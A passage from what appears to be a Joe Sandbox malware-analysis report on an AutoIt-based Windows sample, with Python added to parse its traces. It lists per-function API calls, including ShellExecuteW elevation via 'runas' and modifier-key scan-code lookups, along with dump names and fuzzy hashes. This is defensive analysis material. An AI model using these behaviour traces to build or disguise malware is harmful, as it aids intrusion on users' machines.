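    r"(?P<proc>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.(?P<type>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp")
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
# APIs that take no parameters: any "arguments" the report prints for them are the
# stack slots at the call site, usually already set up for the following call.
ZERO_PARAM_APIS = {"GetForegroundWindow", "OleUninitialize", "GetTickCount",
                   "GetCurrentProcess", "GetCurrentProcessId", "GetLastError"}
SHELL_EXECUTE = {"ShellExecuteW", "ShellExecuteA", "ShellExecuteExW", "ShellExecuteExA"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                   # call-site address from 'ref:'
    subcall_of: Optional[int]  # callee address for 'Part of subcall function' lines


def parse_functions(text: str) -> List[List[ApiCall]]:
    """One ApiCall list per function: the bullets between 'APIs' and 'Memory Dump Source'."""
    functions: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        head = line.strip()
        if head == "APIs":
            current = []
            functions.append(current)
        elif head == "Memory Dump Source":
            current = None
        elif current is not None and (m := API_RE.match(line)):
            raw, sub = m.group("args"), m.group("subaddr")
            current.append(ApiCall(m.group("name"), m.group("module"),
                                   [a.strip() for a in raw.split(",")] if raw else [],
                                   int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return functions


def triage(functions: List[List[ApiCall]]) -> Dict[str, List[int]]:
    """Call sites of the 'AutoIt v3' window, of ShellExecute* with 'runas' visible in the
    same function, and of zero-parameter APIs whose printed arguments are stack residue."""
    out: Dict[str, List[int]] = {"autoit_window": [], "runas_elevation": [], "stack_residue_args": []}
    for calls in functions:
        seen = set()  # every argument string seen so far in this function
        for c in calls:
            seen.update(a.lower() for a in c.args)
            if c.name.startswith("CreateWindowEx") and "AutoIt v3" in c.args:
                out["autoit_window"].append(c.ref)
            if c.name in ZERO_PARAM_APIS and c.args:
                out["stack_residue_args"].append(c.ref)
            if c.name in SHELL_EXECUTE and "runas" in seen:
                out["runas_elevation"].append(c.ref)
    return out


def decode_sdmp(name: str) -> Dict[str, object]:
    """Decode an sdmp file name; a fused 'Download File' link suffix is ignored."""
    m = SDMP_RE.search(name)
    if not m:
        raise ValueError("not an sdmp name: %r" % name)
    protect, mtype = int(m.group("protect"), 16), int(m.group("type"), 16)
    return {"process_index": int(m.group("proc"), 16), "base": int(m.group("base"), 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect)), "type": MEM_TYPE.get(mtype, hex(mtype))}


# Constructed from API bullets and dump names visible on this page.
SAMPLE = """\
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000D1459
• OleUninitialize.OLE32(?,00000000), ref: 000D14F8
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000D2C91
Memory Dump Source
APIs
• SetCurrentDirectoryW.KERNEL32(?), ref: 000D2B6B
  • Part of subcall function 000D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001A1418,?,000D2E7F,?,?,?,00000000), ref: 000D3A78
• GetForegroundWindow.USER32(runas,?,?,?,?,?,00192224), ref: 00112C10
• ShellExecuteW.SHELL32(00000000,?,?,00192224), ref: 00112C17
Memory Dump Source
"""

if __name__ == "__main__":
    for key, refs in triage(parse_functions(SAMPLE)).items():
        print(key, [hex(r) for r in refs])
    for m in SDMP_RE.finditer(SAMPLE):
        print(decode_sdmp(m.group(0)))
```

Run it on the text of a whole function export page (copy the page into a file and pass its contents to parse_functions) to get the call sites in one pass; the page-protection decode is a quick sanity check that a dump marked "based on PE: true" really is an executable image section (0x20 = PAGE_EXECUTE_READ, 0x01000000 = MEM_IMAGE at 0xD1000 here) rather than an injected private region.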

Control-flow Graph

APIs
• SetCurrentDirectoryW.KERNEL32(?), ref: 000D2B6B
  • Part of subcall function 000D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001A1418,?,000D2E7F,?,?,?,00000000), ref: 000D3A78
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
• GetForegroundWindow.USER32(runas,?,?,?,?,?,00192224), ref: 00112C10
• ShellExecuteW.SHELL32(00000000,?,?,00192224), ref: 00112C17
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
• String ID: runas
• API String ID: 448630720-4000483414
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,000D3B0F,SwapMouseButtons,00000004,?), ref: 000D3B40
• RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,000D3B0F,SwapMouseButtons,00000004,?), ref: 000D3B61
• RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,000D3B0F,SwapMouseButtons,00000004,?), ref: 000D3B83
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0013ACD3,?,00008000), ref: 0013B0C4
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0013ACD3,?,00008000), ref: 0013B0E9
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0013ACD3,?,00008000), ref: 0013B0F3
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0013ACD3,?,00008000), ref: 0013B126
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001133A2
  • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 000D3A04
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_wcslen
• String ID: Line:
• API String ID: 2289894680-1585850449
Uniqueness

Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 000F0668
  • Part of subcall function 000F32A4: RaiseException.KERNEL32(?,?,?,000F068A,?,001A1444,?,?,?,?,?,?,000F068A,000D1129,00198738,000D1129), ref: 000F3304
• __CxxThrowException@8.LIBVCRUNTIME ref: 000F0685
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                          • String ID: Unknown exception
                                                                                                                                                                                                                                          • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                          • Opcode ID: 090a87c5921772779edd3a3a3deba3a296422ebc4b2714430598f3009406b00b
                                                                                                                                                                                                                                          • Instruction ID: 3af970636ae2d20f772b446ac4455c21b1be2dbe5f76bb3534ac8de54045b547
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 090a87c5921772779edd3a3a3deba3a296422ebc4b2714430598f3009406b00b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AF0AF3490420DA7CF10BAA5EC46CBE7BAD5F40350B604131BA14EA993EF71EA25A681
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000D1BF4
  • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 000D1BFC
  • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000D1C07
  • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000D1C12
  • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 000D1C1A
  • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 000D1C22
  • Part of subcall function 000D1B4A: RegisterWindowMessageW.USER32(00000004,?,000D12C4), ref: 000D1BA2
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000D136A
• OleInitialize.OLE32 ref: 000D1388
• CloseHandle.KERNEL32(00000000,00000000), ref: 001124AB
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 1986988660-0
• Opcode ID: b923ab669869737fd2af8a0eef5596b3f2ad9defcf96184f8932dcb40fccb148
• Instruction ID: 17153f3c64e0399f0a41db87d1657cf5d2fa2d620dccde495299c853cc4bbeb6
• Opcode Fuzzy Hash: b923ab669869737fd2af8a0eef5596b3f2ad9defcf96184f8932dcb40fccb148
• Instruction Fuzzy Hash: 8C71CDB8D01310BFC388EF79AD456A57AE1FB8B394F54822AD00AD7B62EB744481CF50
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 000D3A04
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0013C259
• KillTimer.USER32(?,00000001,?,?), ref: 0013C261
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0013C270
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
• Opcode ID: 3aad2aab287ac549f8103df84c728f4a7b6cc708cc0e174fc4118942ef1d62ec
• Instruction ID: 59e953cce710bfcc0b6b4c3828aa52f6c428986c027bcbf4ef96749184ffe3ff
• Opcode Fuzzy Hash: 3aad2aab287ac549f8103df84c728f4a7b6cc708cc0e174fc4118942ef1d62ec
• Instruction Fuzzy Hash: C931C370904344AFEB22DF648855BE7BBECAF16304F00049AD2DAA7242C7745A84CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,001085CC,?,00198CC8,0000000C), ref: 00108704
• GetLastError.KERNEL32(?,001085CC,?,00198CC8,0000000C), ref: 0010870E
• __dosmaperr.LIBCMT ref: 00108739
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ChangeCloseErrorFindLastNotification__dosmaperr
• String ID:
• API String ID: 490808831-0
• Opcode ID: 1186768358564064ca94f694934db83c8b070c41fa0aade4472902c2618dcff8
• Instruction ID: b0999b4f4d031274979a756eb12e4a8c73b366c4829e5485a2da80eba0cf30a4
• Opcode Fuzzy Hash: 1186768358564064ca94f694934db83c8b070c41fa0aade4472902c2618dcff8
• Instruction Fuzzy Hash: 94018E32A0C2241BC7246334A84577F2B4A5BA2774F3A0119F8C49F1D3DFE2CCC18690
Uniqueness
Uniqueness Score: -1.00%
                                                                                                                                                                                                                                          Uniqueness Score: -1.00%
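The listing blocks above are Joe Sandbox's per-function API traces: each records the Win32 and CRT calls a function (and its immediate subcalls) makes, with raw hexadecimal arguments, the memory dump the code was lifted from and the opcode and instruction fuzzy hashes used for similarity matching. Reading them by hand means looking up constants such as the MapVirtualKeyW virtual-key codes (0x5B, 0x10, 0xA0, 0xA1, 0x11, 0x12 above are VK_LWIN, VK_SHIFT, VK_LSHIFT, VK_RSHIFT, VK_CONTROL and VK_MENU) or the Sleep and SetTimer periods. The Python below is an added example and not part of the Joe Sandbox report or its tooling: it parses blocks in this rendered format into records, strips the "Download File" link text that the page fuses onto the dump names, decodes the handful of constants that occur in the traces above, and tags each block by the Win32 idiom its call chain forms (a PeekMessage/TranslateMessage/DispatchMessage polling loop, modifier-key scan-code lookups, tray-icon updates). The idiom tags, the decoder table and the block/record names are this example's own; SAMPLE is a trimmed excerpt of the listing above, embedded as constructed test input.

```python
"""Parse Joe Sandbox function-listing blocks (the rendered format above), decode a
few Win32 argument constants and tag each block by the API idiom it forms.
Added example, not Joe Sandbox code; SAMPLE is an excerpt of the listing above."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# "[Part of subcall function ADDR: ]Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
                    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",    # winuser.h
            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
NIM_NAMES = {0: "NIM_ADD", 1: "NIM_MODIFY", 2: "NIM_DELETE"}       # Shell_NotifyIcon dwMessage
DECODERS = {  # API name -> (argument index, decoder for that argument's value)
    "MapVirtualKeyW": (0, VK_NAMES.get),
    "Shell_NotifyIconW": (0, NIM_NAMES.get),
    "Sleep": (0, lambda v: f"{v} ms"),
    "SetTimer": (2, lambda v: f"uElapse={v} ms"),
    "PeekMessageW": (4, lambda v: "PM_REMOVE" if v & 1 else "PM_NOREMOVE"),
}
# args: raw hex strings ("?" = unresolved); subcall: callee address when one level down
ApiCall = namedtuple("ApiCall", "name module args ref subcall")

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # key -> list of values ("API ID", "Associated", ...)
    uniqueness: str = None

def parse_blocks(text):
    """A block starts at an 'APIs' heading and ends at its 'Uniqueness Score' line."""
    blocks, cur, section = [], None, None
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        item = line.lstrip("•").strip()
        if line in SECTIONS:
            if line == "APIs":
                cur = FunctionBlock()
                blocks.append(cur)
            section = line
        elif cur is None:
            pass
        elif line.startswith("Uniqueness Score:"):
            cur.uniqueness, cur = item.split(":", 1)[1].strip(), None
        elif section == "APIs" and (m := API_RE.match(item)):
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), m.group("sub")))
        elif section != "APIs" and ":" in item:
            key, val = (s.strip() for s in item.split(":", 1))
            cur.meta.setdefault(key, []).append(val.removesuffix("Download File"))  # fused link text
    return blocks

def _hex(arg):
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None

def describe(call):
    """Render a call with the constant a reviewer would otherwise look up by hand."""
    idx, decode = DECODERS.get(call.name, (None, None))
    note = ""
    if decode and len(call.args) > idx:
        v = _hex(call.args[idx])
        note = (decode(v) if v is not None else None) or ""
    text = f"{call.name}.{call.module}({','.join(call.args)}) @ {call.ref}"
    return f"{text}  ; {note}" if note else text

def classify(block):
    """Tag a block by the Win32 idiom its call chain forms (tag names are this example's)."""
    names, tags = {c.name for c in block.apis}, set()
    if {"PeekMessageW", "TranslateMessage", "DispatchMessageW"} <= names:
        tags.add("message-pump")        # polling loop; with Sleep, a GUI runtime's idle loop
    if any(c.name == "MapVirtualKeyW" and _hex(c.args[0]) in VK_NAMES
           for c in block.apis if c.args):
        tags.add("modifier-key-state")  # Shift/Ctrl/Alt/Win scan codes, as a keystroke sender needs
    if "Shell_NotifyIconW" in names:
        tags.add("tray-icon")
    return tags

SAMPLE = """\
APIs
  • Part of subcall function 000D1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000D1BF4
• OleInitialize.OLE32 ref: 000D1388
Memory Dump Source
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
Uniqueness
Uniqueness Score: -1.00%

APIs
• TranslateMessage.USER32(?), ref: 000DDB7B
• DispatchMessageW.USER32(?), ref: 000DDB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000DDB9F
• Sleep.KERNEL32(0000000A), ref: 000DDBB1
Similarity
• API ID: Message$Translate$AcceleratorDispatchPeekSleep
"""
```

Running `parse_blocks` over the whole listing (pasted as text) gives one record per function; `describe` then prints, for example, `Sleep.KERNEL32(0000000A) @ 000DDBB1  ; 10 ms` and `MapVirtualKeyW.USER32(0000005B,00000000) @ 000D1BF4  ; VK_LWIN`, and `classify` tags the last block above as a message pump. The `Instruction Fuzzy Hash` values land in `meta`, so the same records can be fed to a similarity comparison across samples; a block whose `uniqueness` is `-1.00%`, as every block here, carries no uniqueness verdict from the sandbox and should not be read as "unique".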

APIs
• TranslateMessage.USER32(?), ref: 000DDB7B
• DispatchMessageW.USER32(?), ref: 000DDB89
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000DDB9F
• Sleep.KERNEL32(0000000A), ref: 000DDBB1
• TranslateAcceleratorW.USER32(?,?,?), ref: 00121CC9
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchPeekSleep
• String ID:
                                                                                                                                                                                                                                          • API String ID: 3288985973-0
                                                                                                                                                                                                                                          • Opcode ID: c5962ec133d7f47ca532ddcab22bbb10932b1b052f08aaa58270eb30dbc726aa
                                                                                                                                                                                                                                          • Instruction ID: 181727253c7091e7650fe6d84492e16fbbc75e6a6da80d209c8f9d5179b5d0c2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5962ec133d7f47ca532ddcab22bbb10932b1b052f08aaa58270eb30dbc726aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FF08230644380EBE730CB60DC49FEA73ECEB45310F50451AE64AD35C0DB749498DB65
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 000E17F6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                                                                          • String ID: CALL
                                                                                                                                                                                                                                          • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                          • Opcode ID: c816cb5b1bc964a6814a2469b79196c71b465011bbf8fa68e9cc0c8d8b768dd1
                                                                                                                                                                                                                                          • Instruction ID: 1fb3e381f0b431b1a1a1a58a514883487f6acf8e9c822573d728ced860d05b96
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c816cb5b1bc964a6814a2469b79196c71b465011bbf8fa68e9cc0c8d8b768dd1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E229E70608381DFC724DF15D480AAABBF1BF89314F14895DF496AB3A2D731E951CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00112C8C
                                                                                                                                                                                                                                            • Part of subcall function 000D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000D3A97,?,?,000D2E7F,?,?,?,00000000), ref: 000D3AC2
                                                                                                                                                                                                                                            • Part of subcall function 000D2DA5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000D2DC4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                          • String ID: X
                                                                                                                                                                                                                                          • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                          • Opcode ID: 091be945cf1a27b1a6d4503e37938e888ed7f152ade2bde519d0356585794060
                                                                                                                                                                                                                                          • Instruction ID: bcaf7d8017995c9bf25357d3b3daf2df7e6514e63a53e920b0e9facd326237d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 091be945cf1a27b1a6d4503e37938e888ed7f152ade2bde519d0356585794060
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7219071A00258ABDF45EF94C845BEE7BF8AF59314F00805AE505B7342EBB45A898FB1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000D3908
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
